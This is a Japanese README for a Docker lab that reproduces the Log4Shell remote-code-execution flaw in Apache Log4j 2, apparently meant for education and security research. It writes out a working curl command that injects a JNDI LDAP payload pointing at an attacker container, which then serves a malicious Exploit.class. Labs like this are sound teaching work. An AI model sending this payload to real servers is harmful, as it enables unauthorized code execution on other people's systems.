
このプロジェクトは、Apache Log4j 2ライブラリのLog4Shell脆弱性を介したRCE攻撃シナリオをシミュレートします。
Exploit.classを提供するHTTPサーバーを含みます。DockerとDocker Composeがインストールされている必要があります。
docker compose up --build
両方のコンテナが準備できるまで待ちます。vulnerable-appはポート8080で実行されます。
新しいターミナルを開き、X-Api-Versionヘッダーを介してJNDIペイロードを含むリクエストを送信します:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-appコンテナのログを確認します。ペイロードがログに記録されたメッセージが表示されます。attackerコンテナのログを確認します。LDAP接続がHTTPサーバーにリダイレクトされていることがわかります。/tmp/pwnedファイルがvulnerable-appコンテナ内に作成されたかどうかを確認します:docker exec -it vulnerable-app ls -la /tmp/pwned
ファイルが存在する場合、悪意のあるコードExploit.classが正常に実行されたことを示します!
このプロジェクトは教育およびセキュリティ研究のみを目的としています。違法な目的で使用しないでください。